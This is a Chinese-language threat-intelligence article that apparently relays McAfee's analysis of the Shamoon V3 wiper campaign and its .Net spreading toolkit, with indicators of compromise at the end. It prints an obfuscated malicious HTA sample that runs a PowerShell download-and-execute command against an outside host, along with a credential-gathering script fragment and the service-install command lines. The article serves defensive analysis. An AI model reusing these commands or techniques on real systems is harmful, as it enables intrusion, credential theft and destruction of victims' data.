疑似伊朗黑客组织APT33再出手，利用Shamoon V3发起新一波攻击

在上周，McAfee高级威胁研究小组发布了一篇分析文章。在这篇文章中，该研究小组分析了针对中东和欧洲企业的新一波Shamoon“wiper（磁盘擦除恶意软件）”攻击活动，并讨论了最新Shamoon攻击活动与此前Shamoon攻击活动的区别。其中最值得关注的是，最新版本的Shamoon（Shamoon V3）作为一个wiper模块，也作为一种独立的恶意软件被使用。

基于对Shamoon V3的分析以及其他一些线索，，该研究小组得出了这样一个结论，这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33，或一个试图伪装成APT33的黑客组织。

在2016到2017年期间的Shamoon攻击活动中，攻击者同时使用了Shamoon V2和另一种wiper——Stonedrill。而在2018年的攻击活动中，该研究小组观察到了Shamoon V3和另一款最初由赛门铁克提到的wiper——Filerase。

该研究小组的分析表明，最新版本的Shamoon似乎只是一个包含多个模块的.Net工具包的一部分。具体来说，该研究小组确认了以下模块：

OCLC.exe：用于读取攻击者创建的目标计算机列表，并负责运行第二个工具spreader.exe。
Spreader.exe：用于向目标计算机传播wiper。另外，它也被用于获取有关操作系统版本的信息。
SpreaderPsexec.exe：与spreader.exe类似，但它使用的是psexec.exe来远程执行wiper。
SlHost.exe：wiper模块，遍历系统并擦除每一个目标文件。

这也反映出，至少有多名开发人员参与了为最新一波攻击准备恶意软件的工作。该研究小组曾在上一篇文章中指出，Shamoon V3作为.Net工具包中的一个wiper模块，它也可作为一种独立的恶意软件供其他攻击组织使用。从最近的这些攻击来看，这种假设似乎得到了证实。该研究小组还了解到，攻击者在数个月前就已经启动了新活动的前期准备工作，目标旨在通过wiper的执行来破坏目标系统。

这篇文章提供了有关新一波Shamoon攻击的更多见解，以及对.Net工具包的详细分析。

地缘政治背景

与此前一样，攻击的动机尚不明确。因为，Shamoon V1攻击的是位于中东的两个目标，Shamoon V2攻击的是位于沙特阿拉伯的多个目标，而Shamoon V3利用欧洲的供应商对中东企业发起了供应链攻击。

在这个.Net工具包中，该研究小组发现了如下ASCII图案：

这些字符组成了一个类似于阿拉伯文“تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ”的图案。这是古兰经（Surah Masad, Ayat 1 [111:1]）中的一句话，意思是“愿火焰之父的双手毁灭吧！他已经毁灭。”

攻击流程

恶意软件是如何进入受害者的网络的？

该研究小组的分析表明，攻击者在前期准备阶段创建了一些与某些合法域名（提供就业机会的网站）非常相似的网站。例如：

Hxxp://possibletarget.ddns.com:880/JobOffering

由该研究小组发现的许多URL都与主要在中东运营的能源企业有关，其中一些网站还包含有执行其他payload的恶意HTML应用程序文件，其余网站则旨在诱使受害者使用自己的凭证进行登录。根据McAfee的遥测数据，这些攻击似乎是从2018年8月底开始的，而目的就是收集这些凭证。

以下是一个恶意HTML应用程序文件的代码示例：

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)

ULRXZmHsCORQNoLHPxW = “cm”

zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘http://mynetwork.ddns.net:880/*****.ps1’)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)

OoOVRmsXUQhNqZJTPOlkymqzsA.run(‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

上面这个脚本被用于在受害者的计算机上打开一个命令shell，并从外部下载一个PowerShell脚本。对PowerShell脚本的分析表明，它被用于收集用户名、密码和域名等信息。以下是PowerShell脚本的部分代码：

function primer {

if ($env:username -eq “$($env:computername)$”){$u=”NT AUTHORITY\SYSTEM”}else{$u=$env:username}

$o=”$env:userdomain\$u

$env:computername

$env:PROCESSOR_ARCHITECTURE

通过收集到的凭证，攻击者能够登录到目标网络中，并传播wiper。

.Net工具包

如上所述，新一波Shamoon攻击是通过一个.Net工具包进行的，旨在传播ShamoonV3和Filerase。

第一个模块（OCLC.exe）被用于读取存储在两个本地目录（“shutter”和“light”）中的两个文本文件，它们包含有目标计算机列表。

另外，OCLC.exe也被用于启动一个新的隐藏命令窗口进程来运行第二个模块Spreader.exe，该模块被用于使用上述两个文本文件作为参数，以传播ShamoonV3和Filerase。

首先，Spreader.exe模块会使用上述包含目标计算机列表和Windows版本的两个文本文件作为参数，以检查目标计算机的Windows版本。

然后，将可执行文件（Shamoon和Filerase）放入文件夹“Net2”中。

另外，它还会在远程计算机上创建一个文件夹：C:\\Windows\System32\Program Files\Internet Explorer\Signing。

然后，将上述可执行文件复制到该文件夹中。

接下来，它会创建一个批处理文件“\\RemoteMachine\admin$\\process.bat”来运行远程计算机上的可执行文件。需要注意的是，这个批处理文件包含了可执行文件的路径。然后，它会设置运行批处理文件的权限。

如果上述过程失败，Spreader.exe模块还会创建一个名为“NotFound.txt”的文本文件，其中包含目标计算机名称和操作系统版本。攻击者可以通过它来追踪传播过程中出现的问题。

以下展示的是上述过程所涉及到的一些函数：

如果在文件夹“Net2”中不存在可执行文件，Spreader.exe模块则会检查文件夹“all”和“Net4”。

为了传播wiper，攻击者还使用了另一个模块SpreaderPsexec.exe。需要说明的是，Psexec.exe是微软PSTools工具中的一种用于远程执行命令的管理工具。

这里的区别在于，SpreaderPsexec.exe使用的Psexec.exe存储在文件夹“Net2”中。这意味着它也可以在其他计算机上使用，以进一步传播wiper。

wiper包含三个选项：

SilentMode：在没有任何输出的情况下运行wiper。
BypassAcl：提升权限。值得注意的是，它始终是开启的。
PrintStackTrace：追踪已擦除的文件夹和文件的数量。

如上所述，BypassAcl始终是开启的（始终为“true” ）。它为wiper提供了以下权限：

SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeSecurityPrivilege

为了找到目标文件，wiper使用了GetFullPath函数来获取路径。

它会擦除找到的每一个目标文件夹和文件。

正如文章一开头所说的那样，它能够遍历系统每一个文件夹中的每一个文件。

对于要擦除的文件和文件夹，wiper首先会移除它们的“只读”属性。

接下来，它会将每个文件的创建、修改及访问时间都更改为3000年1月1日 12:01:01。

然后，它会使用随机字符串对每个文件进行两次重写。

它首先会使用带有ACCESS_MASK DELETE flag的API CreateFile擦除文件。

然后，使用FILE_DISPOSITION_INFORMATION擦除文件。

ProcessTracker函数则被用来追踪擦除的情况。

总结

McAfee高级威胁研究小组表示，在2017年的Shamoon攻击浪潮中，他们观察到了两种wiper。在2018年12月的攻击中，他们观察到了类似的特征。采用“工具包”的形式，攻击者可以通过受害者的网络来传播wiper模块。工具包是采用.Net编写的，且没有经过混淆处理。这与作为wiper模块的Shamoon V3不同，它的代码是经过加密处理的，作为一种逃避安全检测的手段。

很难确定这些攻击的动机，因为McAfee高级威胁研究小组还没有找到足够的线索。但他们表示，确实在Shamoon V3中看到了出现在Shamoon V2中的技术。另外，政治声明似乎已经成为Shamoon攻击的一部分。在V1中，攻击者使用了一张正在燃烧的美国国旗的图片。在V2中，攻击者使用了一张溺亡的叙利亚男孩的图片（附带有也门阿拉伯语的文字），似乎暗指叙利亚和也门的冲突。现在，我们在V3中看到了一段摘自《古兰经》的句子，可能预示着攻击的动机与另一场中东冲突有关。

通过对比在这些攻击中使用的TTP（战术、技术和流程），以及域名和工具（如FireEye在其报告中所描述的），McAfee高级威胁研究小组得出结论，这些攻击背后的幕后黑手很可能是伊朗黑客组织APT33，或一个试图伪装成APT33的黑客组织。

IOC

散列值：

OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

文件路径和文件名：

C:\net2\
C:\all\
C:\net4\
C:\windows\system32\
C:\\Windows\System32\Program Files\Internet Explorer\Signing
\\admin$\process.bat
NothingFound.txt
MaintenaceSrv32.exe
MaintenaceSrv64.exe
SlHost.exe
OCLC.exe
Spreader.exe
SpreaderPsexec.exe

命令行：

cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
cmd.exe /c “ping -n 30 127.0.0.1 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 127.0.0.1 >nul && sc start MaintenaceSrv
MaintenaceSrv32.exe LocalService
cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
MaintenaceSrv32.exe service